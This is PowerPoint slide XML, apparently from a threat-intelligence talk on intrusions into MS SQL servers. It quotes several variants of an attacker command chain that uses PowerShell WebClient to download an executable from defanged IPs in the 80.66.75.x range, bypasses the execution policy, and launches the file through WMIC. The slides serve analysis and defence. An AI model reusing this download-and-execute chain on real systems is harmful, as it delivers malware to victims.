            <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="D80B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1371600"/>
            <a:r>
              <a:rPr lang="en-GB" sz="20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/C echo $cl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="200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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 156">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A198153B-E046-2E0C-155E-875A4026021A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3397195" y="388621"/>
            <a:ext cx="1205793" cy="1205793"/>
            <a:chOff x="9228675" y="2933048"/>
            <a:chExt cx="4118889" cy="4118889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="35" name="Group 157">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50806D0E-6F5F-8BE6-01D7-1233E88D8AC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9228675" y="2933048"/>
              <a:ext cx="4118889" cy="4118889"/>
              <a:chOff x="7931149" y="2626295"/>
              <a:chExt cx="4118889" cy="4118889"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="37" name="Group 159">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{825C668A-81CB-463F-A357-228AE18F2A66}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="11339954" y="3278140"/>
                <a:ext cx="522194" cy="527315"/>
                <a:chOff x="3190875" y="974570"/>
                <a:chExt cx="249325" cy="251770"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="39" name="Rectangle 161">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A683408-4A22-AF01-DB95-1771C30360D6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="40" name="Rectangle 162">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD02AB51-D9A7-9D35-1B0A-F17501941121}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="41" name="Rectangle 163">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E2CE5D8-F002-535C-E08B-03B0ABF9A7E0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="42" name="Rectangle 164">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{660EB8AC-5E6F-1A68-30D3-1C26B5414452}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="38" name="Graphic 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{403DCE12-6EC6-5323-7A1D-B911703FFF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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7931149" y="2626295"/>
                <a:ext cx="4118889" cy="4118889"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Oval 158">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD5AFDD-7C68-20A5-4F7B-0EB5F18A1FA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10515933" y="4127841"/>
              <a:ext cx="1578270" cy="46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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D353D653-61A0-B693-BB4F-C4CB001ADC6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187611" y="738481"/>
            <a:ext cx="5358657" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4754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971236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6A931-C2B2-E0D3-1E39-E5334F3558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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2338420-F65B-A34E-E07F-9AB3B62C76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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50E07E4E-A114-1008-9EE8-7B38CEE68E8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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F57D9C6-AA59-12D5-DF9A-D565B59EA9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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB60BE08-2751-8DA4-3A4E-EB817F4D198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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="13730680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" hidden="1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D632A6D-00A1-9525-9219-4D2A3A40BD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78127" y="-67586"/>
            <a:ext cx="13425772" cy="10189508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="122" name="Group 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE1113CE-FFC2-3EEF-13E2-B040BB80292D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="914400" y="1953783"/>
            <a:ext cx="16459200" cy="3185521"/>
            <a:chOff x="914400" y="2120365"/>
            <a:chExt cx="16459200" cy="3185521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0C5DE5C-0EB3-4CC7-782A-6830EF5F8B07}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="914400" y="2120365"/>
              <a:ext cx="16459200" cy="3185521"/>
              <a:chOff x="9783551" y="1103017"/>
              <a:chExt cx="16459200" cy="3185521"/>
            </a:xfrm>
          </p:grpSpPr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2B3753CC-BAE6-0A4A-9360-E2888B89CE2F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9783551" y="1103017"/>
                <a:ext cx="16459200" cy="3185521"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 6307"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="000D13"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="424D56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K"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="29" name="Graphic 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A5F6EC0-98C3-2818-50B5-B2A5654667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rcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10126322" y="1300398"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38F72E05-560B-EB9C-3278-E88E85107893}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9928226" y="1818602"/>
                <a:ext cx="16134415" cy="2395843"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1079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811382">
                  <a:defRPr/>
                </a:pP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%SYSTEM%\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cmd.exe</a:t>
                </a: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”C:\Windows\\System32\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cmd.exe</a:t>
                </a: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” /C echo $cl = New-Object </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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System.Net.WebClient</a:t>
                </a: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&gt;C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\updt.ps1 &amp; echo $</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cl.DownloadFile</a:t>
                </a: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(“</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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hxxp</a:t>
                </a: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://80.66.75[.]47/</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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Dxccaejs.exe</a:t>
                </a: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”, ”C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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tzt.bat</a:t>
                </a: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”) &gt;&gt; C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\updt.ps1 &amp; </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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powershell</a:t>
                </a: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–</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ExecutionPolicy</a:t>
                </a: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Bypass C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\updt.ps1 &amp; WMIC process call create ”C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="65000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>tzt.bat</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="6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”</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="139" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F42896F1-3ECF-49CE-2A7B-72D5CF971B44}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1862260" y="2244337"/>
              <a:ext cx="6098468" cy="467642"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1371600"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Administrator: C:\\Windows\system32\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cmd.exe</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49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9AFA5C8-D8F4-6BF6-EEB8-1839A75FC519}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="914400" y="5498673"/>
            <a:ext cx="7961243" cy="3873927"/>
            <a:chOff x="9783551" y="1103017"/>
            <a:chExt cx="7961243" cy="3873927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1E53415E-AEA4-A7EE-6ADC-71BD84897537}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9783551" y="1103017"/>
              <a:ext cx="7961243" cy="3873927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solidFill>
                <a:srgbClr val="424D5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14" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AD4956E-2302-B816-A38B-49D492D84360}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9928227" y="1888978"/>
              <a:ext cx="7279854" cy="2477128"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pP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/C echo $cl = New-Object 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System.Net.WebClient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&gt;%TEMP%\updt.ps1 &amp; echo $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cl.DownloadFile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(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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>hXXp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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>://80[.]66.75]]]].40/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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>XXXXXXXXX.exe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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"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, 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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"%TEMP%\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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>xxxx.exe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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"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) &gt;&gt; %TEMP%\updt.ps1 &amp; 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powershell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-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ExecutionPolicy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Bypass %TEMP%\updt.ps1 &amp; WMIC process call create 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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"%TEMP%\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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>XXXXXXXX.exe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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" kern="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="8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A6B1440-31A6-8FB1-0169-CB8533660B75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9412357" y="5498673"/>
            <a:ext cx="7961243" cy="3873927"/>
            <a:chOff x="9783551" y="1103017"/>
            <a:chExt cx="7961243" cy="3873927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B4860FE1-CCAD-13EC-28C4-95953B297334}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9783551" y="1103017"/>
              <a:ext cx="7961243" cy="3873927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solidFill>
                <a:srgbClr val="424D5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20" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20EC66C6-A14E-A4E2-1187-8BC9EE30FD7B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9928226" y="2068146"/>
              <a:ext cx="7746993" cy="2551461"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
              <a:noFill/>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1811382">
                <a:defRPr/>
              </a:pP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"\"C:\\Windows\\\\System32\\\\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cmd.exe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\" /C echo $cl = New-Object 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System.Net.WebClient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&gt; C:\Users\MSSQLS~1\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AppData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\Local\Temp\updt.ps1 &amp; echo $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cl.DownloadFile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(\"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hxxp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://80.66.75[.]36/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aRX.exe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\", \"C:\Users\MSSQLS~1\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AppData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\Local\Temp\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tzt.exe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\") &gt;&gt; %TEMP%\\updt.ps1 &amp; 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powershell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-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ExecutionPolicy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Bypass C:\Users\MSSQLS~1\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AppData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\Local\Temp\updt.ps1 &amp; WMIC process call create \"C:\Users\MSSQLS~1\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AppData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\Local\Temp\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1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tzt.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="8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\""</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" kern="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="8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</p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Graphic 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECB42166-1063-B500-7004-3B8CABCCD3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823503" y="5840056"/>
            <a:ext cx="2004062" cy="368563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A6DE6E65-E744-71C0-E4B0-93BD3F8068B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322317" y="5808437"/>
            <a:ext cx="2286000" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle: Rounded Corners 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{502CFAA0-1989-B34A-2212-CE1FAAFD1E5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12351474" y="7201815"/>
            <a:ext cx="2955826" cy="467642"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln cap="rnd">
            <a:noFill/>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="accent4">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="D80B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1371600"/>
            <a:r>
              <a:rPr lang="en-GB" sz="200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hxxp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="20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://80.66.75[.]36</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="200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26" name="Rectangle: Rounded Corners 28">
            <a:extLst>
